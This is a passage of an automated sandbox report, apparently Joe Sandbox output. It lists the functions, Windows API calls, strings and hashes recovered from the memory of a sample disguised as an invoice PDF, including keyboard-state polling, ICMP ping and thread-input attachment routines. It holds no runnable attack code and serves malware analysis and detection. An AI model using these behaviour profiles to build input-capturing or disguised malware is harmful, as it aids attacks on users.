SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0046FBCC
VariantClear.OLEAUT32(?), ref: 0046FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0046FBE9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c215a2eadedc096187399e35b036147ca007a2358cc53a2e26fafaf8e74fc690
Instruction ID: 69da9d415d22f4735617171077b00187f906dca4e4e7837b33ff6fada278e84d
Opcode Fuzzy Hash: c215a2eadedc096187399e35b036147ca007a2358cc53a2e26fafaf8e74fc690
Instruction Fuzzy Hash: E9417275A002199FCB00DF64D8949EEBFB9FF49344F00807AE945A7261DB34E945CF99

Function 00479C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00479CA1
GetAsyncKeyState.USER32(000000A0), ref: 00479D22
GetKeyState.USER32(000000A0), ref: 00479D3D
GetAsyncKeyState.USER32(000000A1), ref: 00479D57
GetKeyState.USER32(000000A1), ref: 00479D6C
GetAsyncKeyState.USER32(00000011), ref: 00479D84
GetKeyState.USER32(00000011), ref: 00479D96
GetAsyncKeyState.USER32(00000012), ref: 00479DAE
GetKeyState.USER32(00000012), ref: 00479DC0
GetAsyncKeyState.USER32(0000005B), ref: 00479DD8
GetKeyState.USER32(0000005B), ref: 00479DEA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7496078645f185c8b955c02ad3bdb58ae11c5035c34322887f17f5e42b53c589
Instruction ID: 105258d4d7e9098a205df19608756355a8728712edbacb0a07328e843bb98f96
Opcode Fuzzy Hash: 7496078645f185c8b955c02ad3bdb58ae11c5035c34322887f17f5e42b53c589
Instruction Fuzzy Hash: 9F41D8345047C96DFF71866484443F7BEA16B12344F08C05BDACA567C2EBAC9DC8C79A

Function 0049055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004905BC
inet_addr.WSOCK32(?), ref: 0049061C
gethostbyname.WSOCK32(?), ref: 00490628
IcmpCreateFile.IPHLPAPI ref: 00490636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004906C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004906E5
IcmpCloseHandle.IPHLPAPI(?), ref: 004907B9
WSACleanup.WSOCK32 ref: 004907BF

Strings

Ping, xrefs: 00490676

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: bca20d2b53d845bd82af5770c34f6767645fa4f29116f3035e6f1c36dd73fb6b
Instruction ID: d698bc833c7678b93aeb067f8947c4fc809515c985cc515df99e0be90776a55b
Opcode Fuzzy Hash: bca20d2b53d845bd82af5770c34f6767645fa4f29116f3035e6f1c36dd73fb6b
Instruction Fuzzy Hash: 49917E35604201AFDB20DF15D488F1ABFE0AF44328F1585AAE4698B7A2C738ED85CF95

Function 00498CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00498CF3

Part of subcall function 00478E54: _wcslen.LIBCMT ref: 00478E77

_wcslen.LIBCMT ref: 00498D4E
_wcslen.LIBCMT ref: 00498D9C
_wcslen.LIBCMT ref: 00498DDC
_wcslen.LIBCMT ref: 00498E6E

Strings

cdecl, xrefs: 00498D48, 00498D4D
stdcall, xrefs: 00498DD6, 00498DDB
winapi, xrefs: 00498D96, 00498D9B
none, xrefs: 00498E65, 00498E6A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 2988b8d1db754f97fcb01959b2ec187e4289b9debbd9552d54519e9fb1cf070f
Instruction ID: f2321c66c4dea0c95bd39490f25074e66ef5b59c05288e109135086d3958da2f
Opcode Fuzzy Hash: 2988b8d1db754f97fcb01959b2ec187e4289b9debbd9552d54519e9fb1cf070f
Instruction Fuzzy Hash: 9F519071A001169BCF14DF6DC9609BEBBA5AF66324B21423FE426E7384DB39DD40C798

Function 0049372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00493774
CoUninitialize.OLE32 ref: 0049377F
CoCreateInstance.OLE32(?,00000000,00000017,004AFB78,?), ref: 004937D9
IIDFromString.OLE32(?,?), ref: 0049384C
VariantInit.OLEAUT32(?), ref: 004938E4
VariantClear.OLEAUT32(?), ref: 00493936

Strings

Invalid parameter, xrefs: 00493865
NULL Pointer assignment, xrefs: 0049381E
Failed to create object, xrefs: 004937E4, 0049389A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: b7e515fd61e39f531d2e238a45fd2308c25a0814427ae7bcd0934277a01a210d
Instruction ID: c09ade78cfc8693cfbb62d65456be79016457365495fb0cb24c547c6a8c76256
Opcode Fuzzy Hash: b7e515fd61e39f531d2e238a45fd2308c25a0814427ae7bcd0934277a01a210d
Instruction Fuzzy Hash: 6561B070608301AFD710EF55C888B6ABBE4EF4A705F10486FF58597291C778EE49CB9A

Function 004A8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

Part of subcall function 0042912D: GetCursorPos.USER32(?), ref: 00429141
Part of subcall function 0042912D: ScreenToClient.USER32(00000000,?), ref: 0042915E
Part of subcall function 0042912D: GetAsyncKeyState.USER32(00000001), ref: 00429183
Part of subcall function 0042912D: GetAsyncKeyState.USER32(00000002), ref: 0042919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 004A8B6B
ImageList_EndDrag.COMCTL32 ref: 004A8B71
ReleaseCapture.USER32 ref: 004A8B77
SetWindowTextW.USER32(?,00000000), ref: 004A8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004A8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 004A8CFF

Strings

p#N, xrefs: 004A8C71
@GUI_DROPID, xrefs: 004A8C51
@GUI_DRAGFILE, xrefs: 004A8C9A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#N
API String ID: 1924731296-3991093434
Opcode ID: 63389a3b073809f7023a30ccf8c2810c9c3a5d1dadbbc6518b67b44e0ba1bb04
Instruction ID: 47c12726a45359ca2c067fea2545401927e23d90b7c28c502135f77aac93ccd2
Opcode Fuzzy Hash: 63389a3b073809f7023a30ccf8c2810c9c3a5d1dadbbc6518b67b44e0ba1bb04
Instruction Fuzzy Hash: 33518B70204200AFD704EF15DC95FAA77E4FB89714F400A2EF996572E2DB789D44CB6A

Function 00483388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004833CF

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004833F0

Strings

Error: , xrefs: 004834D1
^ ERROR , xrefs: 0048349E
Line %d (File "%s"):, xrefs: 00483443, 0048345C
"%s" (%d) : ==> %s:, xrefs: 00483522
Incorrect parameters to object property !, xrefs: 004834AB
"%s" (%d) : ==> %s:%s%s, xrefs: 00483504

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 6ea0d7c2c853f6a934c42abcbb9be09a3db4626d125d3968394dc3766bb60776
Instruction ID: 7695c21b8b36afe79131069c5ec5d0ca14b9c4d6ae953ec27149b8bd75fa862b
Opcode Fuzzy Hash: 6ea0d7c2c853f6a934c42abcbb9be09a3db4626d125d3968394dc3766bb60776
Instruction Fuzzy Hash: D051D471900209BADF14EBE1CD52EEEB778AF04744F20446BF50572162EB392F98DB68

Function 0047B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0047B5FC
_wcslen.LIBCMT ref: 0047B608
_wcslen.LIBCMT ref: 0047B64D
_wcslen.LIBCMT ref: 0047B68C
_wcslen.LIBCMT ref: 0047B6C7

Strings

REMOVE, xrefs: 0047B602, 0047B607
KEYS, xrefs: 0047B647, 0047B64C
EXISTS, xrefs: 0047B686, 0047B68B
APPEND, xrefs: 0047B6C1, 0047B6C6

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 05988ba4a17b9c84888d3bbc0106db6ad0fca6b2443a379f5b7f8fc0d0f0e533
Instruction ID: 414aed57adbb56d44630540c850783c453eb60b242e3bbd21be030ebb81c53ac
Opcode Fuzzy Hash: 05988ba4a17b9c84888d3bbc0106db6ad0fca6b2443a379f5b7f8fc0d0f0e533
Instruction Fuzzy Hash: 31412A32A001269ACB106F7D88906FF77A1EFA0758B24812BE629D7384E73DCD81C3D5

Function 00485393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004853A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00485416
GetLastError.KERNEL32 ref: 00485420
SetErrorMode.KERNEL32(00000000,READY), ref: 004854A7

Strings

INVALID, xrefs: 00485459
NOTREADY, xrefs: 0048544B
READY, xrefs: 00485460, 00485468
READONLY, xrefs: 00485452
UNKNOWN, xrefs: 00485444

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 8dafa5648ace807a1cbe3412b834b70b3b72cad942207dffd6dc4ceda2610241
Instruction ID: cbe64af34b405703c3480dd1aee301c646ac5b5423df9dc3eb6c89aac84d6b26
Opcode Fuzzy Hash: 8dafa5648ace807a1cbe3412b834b70b3b72cad942207dffd6dc4ceda2610241
Instruction Fuzzy Hash: 0231CE35A002049FDB10EF68C484BAEBBB4EF45709F14846BE405CB392DB79DD82CB95

Function 004A3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 004A3C79
SetMenu.USER32(?,00000000), ref: 004A3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004A3D10
IsMenu.USER32(?), ref: 004A3D24
CreatePopupMenu.USER32 ref: 004A3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004A3D5B
DrawMenuBar.USER32 ref: 004A3D63

Strings

0, xrefs: 004A3C54
F, xrefs: 004A3D4E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 61bf1a0c13cbfdcf9b5887dc7343f0fc2790829543ca24696400371479a97c1a
Instruction ID: 88367d0572a9587ccdce4249f6a151579d92679bdd64667a54bb18dfb3d73e06
Opcode Fuzzy Hash: 61bf1a0c13cbfdcf9b5887dc7343f0fc2790829543ca24696400371479a97c1a
Instruction Fuzzy Hash: 28417EB5A01209EFDB14CF64D884ADA7BB5FF5A351F14002AF946A7360E734AA10CF58

Function 004A3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004A3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004A3AA0
GetWindowLongW.USER32(?,000000F0), ref: 004A3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004A3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004A3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 004A3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004A3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004A3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004A3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004A3C13

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 8750fad242930c77f0ba0a5b7088109129fc0be0950115208b9d46647844f1c6
Instruction ID: 9b9b1362c474cf40edbbecfd28caa1ac6b822cdd5dbcf18cdb8d3d0f30ad3c48
Opcode Fuzzy Hash: 8750fad242930c77f0ba0a5b7088109129fc0be0950115208b9d46647844f1c6
Instruction Fuzzy Hash: 04619F75900248AFDB10DF64CC81EEE77F8EB19314F1000AAFA05A73A2D774AE45DB54

Function 0047B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0047B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B165
GetWindowThreadProcessId.USER32(00000000), ref: 0047B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0047B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0047A1E1,?,00000001), ref: 0047B21D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 83c3472da5634ea67357a083ed23f30d82bf44ddcd5c52161906f8a17ba07ca0
Instruction ID: 60138c64cf79c9cf67be6e330ec5055d278779b652c5cf4ab33331a845a62410
Opcode Fuzzy Hash: 83c3472da5634ea67357a083ed23f30d82bf44ddcd5c52161906f8a17ba07ca0
Instruction Fuzzy Hash: 8731A271540204AFDB119F64DC8CBAE7B69EB51356F108466FA08DB251D7789E008FAC

Function 00442C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00442C94

Part of subcall function 004429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000), ref: 004429DE
Part of subcall function 004429C8: GetLastError.KERNEL32(00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000,00000000), ref: 004429F0

_free.LIBCMT ref: 00442CA0
_free.LIBCMT ref: 00442CAB
_free.LIBCMT ref: 00442CB6
_free.LIBCMT ref: 00442CC1
_free.LIBCMT ref: 00442CCC
_free.LIBCMT ref: 00442CD7
_free.LIBCMT ref: 00442CE2
_free.LIBCMT ref: 00442CED
_free.LIBCMT ref: 00442CFB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: baeddbe0655e94e118552a65794846ef528a4f51d5828953fe4ae3143878e0bf
Instruction ID: c4d3835c6e39c14024aa1b946a06c50d845e7d2803cfcb573c61ee3650419366
Opcode Fuzzy Hash: baeddbe0655e94e118552a65794846ef528a4f51d5828953fe4ae3143878e0bf
Instruction Fuzzy Hash: 6411FEB5200108BFEB02EF56DA42CDD3B65FF05354F81449AF9485F232D675EE509B54

Function 00411410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00411459
OleUninitialize.OLE32(?,00000000), ref: 004114F8
UnregisterHotKey.USER32(?), ref: 004116DD
DestroyWindow.USER32(?), ref: 004524B9
FreeLibrary.KERNEL32(?), ref: 0045251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0045254B

Strings

close all, xrefs: 00411454

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 5ec3eb48e3f989a570a06fdb6b9430a8be4644f511b4f0d83e55093157455a98
Instruction ID: 1cdaf9cef9cef249be199b6956ef20ef562f5cfe89942317c1ea88c597efcc65
Opcode Fuzzy Hash: 5ec3eb48e3f989a570a06fdb6b9430a8be4644f511b4f0d83e55093157455a98
Instruction Fuzzy Hash: FAD1CE30701222DFCB19EF15C594A6AF7A0BF06705F1441AFE90A6B362DB38AC56CF49

Function 00487DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00487FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00487FC1
GetFileAttributesW.KERNEL32(?), ref: 00487FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00488005
SetCurrentDirectoryW.KERNEL32(?), ref: 00488017
SetCurrentDirectoryW.KERNEL32(?), ref: 00488060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004880B0

Strings

*.*, xrefs: 00488066

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 02c14c562326b057d62c3367de2e518dae4fec8a8f033aa912336711c53a88f5
Instruction ID: 60776df3a2aa20ebd64d375f27d7d87eae9c9b1fdb66f3cae49938412a292d9a
Opcode Fuzzy Hash: 02c14c562326b057d62c3367de2e518dae4fec8a8f033aa912336711c53a88f5
Instruction Fuzzy Hash: 8B8190725082019BCB20EF15C8949BFB7E8AF89314F644C5FF889D7250EB38DD458B5A

